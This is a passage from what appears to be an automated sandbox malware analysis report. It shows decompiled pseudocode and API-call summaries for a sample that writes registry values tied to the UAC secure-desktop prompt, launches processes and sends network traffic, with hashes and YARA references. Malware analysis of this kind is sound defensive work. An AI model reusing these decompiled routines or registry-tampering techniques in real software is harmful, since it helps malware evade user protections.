									if(_t57 != 0 && _a8 != 0) {
										E00402544(_t57, _t57, _a8, 0xe4, 0xc8);
										_t67 = _t67 + 0x14;
										if(WriteFile(_v12, _t57, _a8,  &_a8, 0) != 0) {
											 *0x4136c0 =  *0x4136c0 & 0x00000000;
										}
									}
									CloseHandle(_v12);
								}
							}
						}
					}
					if((_a4 & 0x00000002) == 0) {
						L19:
						goto L20;
					}
					_t34 = E0040DFE2(_t58, 2,  &_v8,  &_a8);
					_t68 = _t67 + 0xc;
					if(_t34 == 0 || _a8 == 0) {
						goto L19;
					} else {
						E00402544(_v8, _v8, _a8, 0xe4, 0xc8);
						_t36 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t38 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t36, _v8, _a8);
						_t72 = _t68 + 0x50;
						if(_t38 != 0) {
							L17:
							 *0x4136c0 =  *0x4136c0 & 0x00000000;
							L18:
							E0040EE2A(_t58, 0x4122f8, 0, 0x100);
							E0040EE2A(_t58, 0x4128f8, 0, 0x100);
							goto L19;
						}
						_t41 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t43 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t41, _v8, _a8);
						_t72 = _t72 + 0x3c;
						if(_t43 == 0) {
							goto L18;
						}
						goto L17;
					}
				}
				_t31 = 1;
				_t77 =  *0x4120ec - _t31; // 0x1
				if(_t77 != 0) {
					goto L21;
				}
				goto L2;
			}




















                                                                                                                                  0x0040e17a
                                                                                                                                  0x0040e17b
                                                                                                                                  0x0040e182
                                                                                                                                  0x0040e193
                                                                                                                                  0x0040e199
                                                                                                                                  0x0040e312
                                                                                                                                  0x0040e314
                                                                                                                                  0x0040e315
                                                                                                                                  0x0040e317
                                                                                                                                  0x0040e317
                                                                                                                                  0x0040e1ad
                                                                                                                                  0x0040e1b9
                                                                                                                                  0x0040e1be
                                                                                                                                  0x0040e1c3
                                                                                                                                  0x0040e1c5
                                                                                                                                  0x0040e1c8
                                                                                                                                  0x0040e1d1
                                                                                                                                  0x0040e1d7
                                                                                                                                  0x0040e1d8
                                                                                                                                  0x0040e1de
                                                                                                                                  0x0040e1e0
                                                                                                                                  0x0040e1e5
                                                                                                                                  0x0040e1f4
                                                                                                                                  0x0040e1f9
                                                                                                                                  0x0040e211
                                                                                                                                  0x0040e213
                                                                                                                                  0x0040e213
                                                                                                                                  0x0040e211
                                                                                                                                  0x0040e21d
                                                                                                                                  0x0040e21d
                                                                                                                                  0x0040e1de
                                                                                                                                  0x0040e1c8
                                                                                                                                  0x0040e1c3
                                                                                                                                  0x0040e227
                                                                                                                                  0x0040e310
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e311
                                                                                                                                  0x0040e237
                                                                                                                                  0x0040e23c
                                                                                                                                  0x0040e241
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e251
                                                                                                                                  0x0040e25c
                                                                                                                                  0x0040e278
                                                                                                                                  0x0040e29e
                                                                                                                                  0x0040e2a3
                                                                                                                                  0x0040e2a8
                                                                                                                                  0x0040e2eb
                                                                                                                                  0x0040e2eb
                                                                                                                                  0x0040e2f2
                                                                                                                                  0x0040e2fb
                                                                                                                                  0x0040e308
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e30d
                                                                                                                                  0x0040e2be
                                                                                                                                  0x0040e2df
                                                                                                                                  0x0040e2e4
                                                                                                                                  0x0040e2e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e2e9
                                                                                                                                  0x0040e241
                                                                                                                                  0x0040e186
                                                                                                                                  0x0040e187
                                                                                                                                  0x0040e18d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
                                                                                                                                  • CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
                                                                                                                                    • Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                                                                    • Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                                                                    • Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                                                                    • Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 4151426672-2980165447
                                                                                                                                  • Opcode ID: 42837028a0dd8996e6af557673b827ca3b7a00ccc3ddab19ba292c9f593e834e
                                                                                                                                  • Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
                                                                                                                                  • Opcode Fuzzy Hash: 42837028a0dd8996e6af557673b827ca3b7a00ccc3ddab19ba292c9f593e834e
                                                                                                                                  • Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADE3DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000001,00AD44E2,00000000,00000000,00000000), ref: 00ADE470
                                                                                                                                  • CloseHandle.KERNEL32(00000001,00000003), ref: 00ADE484
                                                                                                                                    • Part of subcall function 00ADE2FC: RegCreateKeyExA.ADVAPI32(80000001,00ADE50A,00000000,00000000,00000000,00020106,00000000,00ADE50A,00000000,000000E4), ref: 00ADE319
                                                                                                                                    • Part of subcall function 00ADE2FC: RegSetValueExA.ADVAPI32(00ADE50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE38E
                                                                                                                                    • Part of subcall function 00ADE2FC: RegDeleteValueA.ADVAPI32(00ADE50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE3BF
                                                                                                                                    • Part of subcall function 00ADE2FC: RegCloseKey.ADVAPI32(00ADE50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,00ADE50A), ref: 00ADE3C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 4151426672-2980165447
                                                                                                                                  • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                                                                  • Instruction ID: e431b7fde5a661188412b3017d7672bc9e83a0fed40b7ed367e3961116126bb9
                                                                                                                                  • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                                                                  • Instruction Fuzzy Hash: DE41DBB1D00204BAEB20BF519D46FEB3B6CDB14764F148027F91A98292E7B58A50DBB4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD8330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 00AD83C6
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 00AD8477
                                                                                                                                    • Part of subcall function 00AD69C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 00AD69E5
                                                                                                                                    • Part of subcall function 00AD69C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 00AD6A26
                                                                                                                                    • Part of subcall function 00AD69C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 00AD6A3A
                                                                                                                                    • Part of subcall function 00ADEE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00AD1DCF,?), ref: 00ADEEA8
                                                                                                                                    • Part of subcall function 00ADEE95: HeapFree.KERNEL32(00000000), ref: 00ADEEAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 359188348-2980165447
                                                                                                                                  • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                                                                  • Instruction ID: 83c901d1cbb598d4c1bf5781275d38b7dd28f92cceb5616135bca7425568397f
                                                                                                                                  • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                                                                  • Instruction Fuzzy Hash: 794160B2900109BFEB11EBA49E81DFF777CEB04740F1444A7F516D6211FAB45E948BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADE631 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00ADE859,00000000,00020119,00ADE859,PromptOnSecureDesktop), ref: 00ADE64D
                                                                                                                                  • RegCloseKey.ADVAPI32(00ADE859,?,?,?,?,000000C8,000000E4), ref: 00ADE787
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 47109696-2980165447
                                                                                                                                  • Opcode ID: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                                                                  • Instruction ID: b1a07be45638ceb199f2d49b2e4510e028316b35dd5be4e407994108621bbb15
                                                                                                                                  • Opcode Fuzzy Hash: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                                                                  • Instruction Fuzzy Hash: 354128B2D0011DBFDF11EF94DD81DEEBBB9EB18304F104466F912A6250E3719E558B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADAFF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00ADAFFF
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00ADB00D
                                                                                                                                    • Part of subcall function 00ADAF6F: gethostname.WS2_32(?,00000080), ref: 00ADAF83
                                                                                                                                    • Part of subcall function 00ADAF6F: lstrcpy.KERNEL32(?,00410B90), ref: 00ADAFE6
                                                                                                                                    • Part of subcall function 00AD331C: gethostname.WS2_32(?,00000080), ref: 00AD333F
                                                                                                                                    • Part of subcall function 00AD331C: gethostbyname.WS2_32(?), ref: 00AD3349
                                                                                                                                    • Part of subcall function 00ADAA0A: inet_ntoa.WS2_32(00000000), ref: 00ADAA10
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %OUTLOOK_BND_
                                                                                                                                  • API String ID: 1981676241-3684217054
                                                                                                                                  • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                                                                  • Instruction ID: c382aa283b3db0e2bde89314964402ed107142c4ad91bffb5615f1ca855481b0
                                                                                                                                  • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                                                                  • Instruction Fuzzy Hash: 3741117290020CAFDB25EFA0DD46EEF3BADFF08304F144427B92692152EA75DA548B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD9452 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 00AD9536
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00AD955D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShellSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4194306370-3916222277
                                                                                                                                  • Opcode ID: c943f70c230d4c69959fc4691754c79ddac5dbfa543e8544ec42df2631d47f9d
                                                                                                                                  • Instruction ID: ffff7ac09cf2432b82d51af15aaf861195ef27e28ab0fcd33773a6df621b0abc
                                                                                                                                  • Opcode Fuzzy Hash: c943f70c230d4c69959fc4691754c79ddac5dbfa543e8544ec42df2631d47f9d
                                                                                                                                  • Instruction Fuzzy Hash: 9041F3B19083856EEB379B64E88C7A73BA49B02310F2841BBD49797393D6B4CD898711
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBBF7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 2903770966-3142137124
                                                                                                                                  • Opcode ID: a04ee2a2c9cdc85e6bbe75af223a59f82e01217bbc2cf6c0f0167175ccb8fb12
                                                                                                                                  • Instruction ID: f06eba00ca50338d182afccefed590286a7ff744b2d7ffef9b9d06e99fb43bf3
                                                                                                                                  • Opcode Fuzzy Hash: a04ee2a2c9cdc85e6bbe75af223a59f82e01217bbc2cf6c0f0167175ccb8fb12
                                                                                                                                  • Instruction Fuzzy Hash: 2A417E71810248DFDF35DF64DC85BEA77B8EB58700F21455BF92682262EB308A81CF61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD2966 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00AD2995
                                                                                                                                  • sendto.WS2_32(?,00412BF8,00000009,00000000,?,00000010), ref: 00AD2A69
                                                                                                                                    • Part of subcall function 00ADEE33: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00ADEE65,?,?,00AD1D75,?,?), ref: 00ADEE3A
                                                                                                                                    • Part of subcall function 00ADEE33: RtlAllocateHeap.NTDLL(00000000,?,00AD1D75), ref: 00ADEE41
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1419455383-3142137124
                                                                                                                                  • Opcode ID: 0403605264f70e2ba04ed5eb857e1fa34a4c1028b668a0d3736469d5bfe16290
                                                                                                                                  • Instruction ID: 1c4ffaaf29cc980964b2dd557ac84924deaf6455bbec7d44925b997b5dbd1b15
                                                                                                                                  • Opcode Fuzzy Hash: 0403605264f70e2ba04ed5eb857e1fa34a4c1028b668a0d3736469d5bfe16290
                                                                                                                                  • Instruction Fuzzy Hash: 5A3138342483929FD7208F74DC50AA17770FF29314B1980BEE856CB322D6B2E882D754
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBD91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00ADB62C: wsprintfA.USER32 ref: 00ADB6CE
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocketwsprintf
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 4077942794-3142137124
                                                                                                                                  • Opcode ID: 807286dfab293aa3b35cedfe51c725f4e5163db31e78ef99f1cf7ca87fcdd825
                                                                                                                                  • Instruction ID: c3a28e708384cbf5bbbe6711c93cbb0161307e729fe69cb4126c656aa42cdc5c
                                                                                                                                  • Opcode Fuzzy Hash: 807286dfab293aa3b35cedfe51c725f4e5163db31e78ef99f1cf7ca87fcdd825
                                                                                                                                  • Instruction Fuzzy Hash: 74316971414288EFDF25DFA4DC45AED77B5FB08700F21415AFA2682261DB71DA81CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBDD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocket
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1869671989-3142137124
                                                                                                                                  • Opcode ID: 1d618aaef58b3ab215079b9b31fa447b3856f6d26cbe6ee9946270808dfc3956
                                                                                                                                  • Instruction ID: a33cd5da4bd6c61ecd29e9074d83b96e495dee5935196dfe6ef435357eadc6e5
                                                                                                                                  • Opcode Fuzzy Hash: 1d618aaef58b3ab215079b9b31fa447b3856f6d26cbe6ee9946270808dfc3956
                                                                                                                                  • Instruction Fuzzy Hash: B1215531814288DFDF24DF64DC84AE97BA4EB48701F61456BFA2683261EB70DA85CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBBE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocket
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1869671989-3142137124
                                                                                                                                  • Opcode ID: 9b58e820c96e30bea9cf8a5773d901c602008467136ce8ddc7967acdf40d357b
                                                                                                                                  • Instruction ID: 78eb766c145a5b1801fbcbd4272ec2dd3561810bf0b5ca532557de55eeae98f7
                                                                                                                                  • Opcode Fuzzy Hash: 9b58e820c96e30bea9cf8a5773d901c602008467136ce8ddc7967acdf40d357b
                                                                                                                                  • Instruction Fuzzy Hash: E3217A71414288DFDF25DF64DC84AE977B9EB48701F21456BFA2683262EB30DA85CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBD77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocket
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1869671989-3142137124
                                                                                                                                  • Opcode ID: 1ad4ab0cef1100dab09d35a4997a37f06c5e750f14e9eb7400ff0985812ffdd9
                                                                                                                                  • Instruction ID: 138a9b6ec2f903cd03d83869ed1e6240bb502a3169cc2ef342a3e2557abe5bab
                                                                                                                                  • Opcode Fuzzy Hash: 1ad4ab0cef1100dab09d35a4997a37f06c5e750f14e9eb7400ff0985812ffdd9
                                                                                                                                  • Instruction Fuzzy Hash: D421AC31414288DFDF24CF64DC88AE977B5EB48701F21405BFA2683261EB30DA80CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADBBC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocket
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1869671989-3142137124
                                                                                                                                  • Opcode ID: 9ae727bc03e3a647016d1a17286895492352c477f613c7904a32ac3000c388d7
                                                                                                                                  • Instruction ID: 84b2e08c6d8d4ff3d508b057f38596aa0b5e84c59a9dac61bce84f879a8079e2
                                                                                                                                  • Opcode Fuzzy Hash: 9ae727bc03e3a647016d1a17286895492352c477f613c7904a32ac3000c388d7
                                                                                                                                  • Instruction Fuzzy Hash: 72219A71414288DFDF25DF64DC84AE977B9EB48701F21456BFA2683261EB30DA85CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD8F55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 536389180-3142137124
                                                                                                                                  • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction ID: 10a0e7a8a972bd0d6959e8caac8a20bd629990511895c3881d8068f1fbc19008
                                                                                                                                  • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
